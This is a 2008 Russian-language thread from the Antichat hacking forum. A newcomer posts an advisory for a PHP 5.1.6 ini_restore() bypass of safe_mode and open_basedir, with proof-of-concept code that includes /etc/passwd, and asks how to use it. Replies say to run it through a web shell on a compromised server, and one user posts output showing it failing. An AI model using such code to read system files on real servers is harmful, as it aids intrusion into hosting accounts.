ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PHP 5.1.6 Exploit
  #1  
Старый 11.06.2008, 13:25
Аватар для fasty
fasty
Познающий
Регистрация: 09.05.2008
Сообщений: 67
Провел на форуме:
690048

Репутация: 13
По умолчанию PHP 5.1.6 Exploit

Нужна помощь)
Каким образом воплотить в жизнь Exploit?

Программа:
PHP 4.4.4 и более ранние версии
PHP 5.1.6 и более ранние версии

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователь получить доступ к важным данным на системе.

Уязвимость существует из-за недостаточного ограничения на смену параметров safe_mode и open_basedir в функции ini_restore(). Если эти ограничения установлены в настройках виртуального хоста Web сервера, а в файле php.ini находятся значения по умолчанию, злоумышленник может восстановить значения по умолчанию и обойти ограничения, установленный в конфигурационном файле Web сервера. Пример уязвимой конфигурации:
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
Эксплоит:
Код
PHP код:
<?
echo ini_get("safe_mode");
echo 
ini_get("open_basedir");
include(
"/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo 
ini_get("safe_mode");
echo 
ini_get("open_basedir");
include(
"/etc/passwd");
?>
Удачная эксплуатация уязвимости позволит злоумышленнику получить доступ к содержимому произвольных файлов на системе.

Если можно пошагово опишите я новичёк...
С помощью какой проги или чё устанавливать чтобы это зделать) Нигде не могу найти ..

Спасибо.
 
Ответить с цитированием

  #2  
Старый 11.06.2008, 13:32
Аватар для LEE_ROY
LEE_ROY
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
Провел на форуме:
1917742

Репутация: 541


По умолчанию

с помощью шелла на серваке с уязвимой версией пыха, эта бага для обхода сейф моде всеголиш
 
Ответить с цитированием

  #3  
Старый 11.06.2008, 15:43
Аватар для fasty
fasty
Познающий
Регистрация: 09.05.2008
Сообщений: 67
Провел на форуме:
690048

Репутация: 13
По умолчанию

Темку можеш дать где проэто почитать или напиши по пунктам чё зделать)

Спасибо)
 
Ответить с цитированием

  #4  
Старый 11.06.2008, 17:02
Аватар для Arrest
Arrest
Новичок
Регистрация: 06.06.2008
Сообщений: 5
Провел на форуме:
18959

Репутация: 9
По умолчанию

Сайты с ее помощью ломать нельзя. А так - просто заливаешь на сервер и читаешь файлики.
 
Ответить с цитированием

  #5  
Старый 11.06.2008, 17:17
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

если в php.ini нет сейфмода а в httpd.conf к примеру стоит php_value safe_mode "1"
то с помощью этой баги можно попробовать востановить значение опции safe_mode. практически это выглядит так- вставляешь в шел эти строчки и юзаешь его без сейф мода.
 
Ответить с цитированием

  #6  
Старый 11.06.2008, 21:44
Аватар для .Striker
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

попробовал на PHP 5.1.6 чето не канает
выдает
1/home/хост/vhosts/:/var/lib/php:/usr/lib/php:/usr/local/lib/php:/tmp/:/usr/share/pear/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/хост/vhosts/:/var/lib/php:/usr/lib/php:/usr/local/lib/php:/tmp/:/usr/share/pear/) in /home/хост/vhosts/имяакка/1.php on line 4

Fatal error: Can't load /etc/passwd, open_basedir restriction. in /home/хост/vhosts/имяакка/1.php on line 4
 
Ответить с цитированием

  #7  
Старый 11.06.2008, 23:10
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

Цитата:
Сообщение от .Striker  
попробовал на PHP 5.1.6 чето не канает
выдает
1/home/хост/vhosts/:/var/lib/php:/usr/lib/php:/usr/local/lib/php:/tmp/:/usr/share/pear/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/хост/vhosts/:/var/lib/php:/usr/lib/php:/usr/local/lib/php:/tmp/:/usr/share/pear/) in /home/хост/vhosts/имяакка/1.php on line 4

Fatal error: Can't load /etc/passwd, open_basedir restriction. in /home/хост/vhosts/имяакка/1.php on line 4
логично , значит чето не канает .
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Что такое Php? PAPA212 Болталка 13 28.12.2007 20:44
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ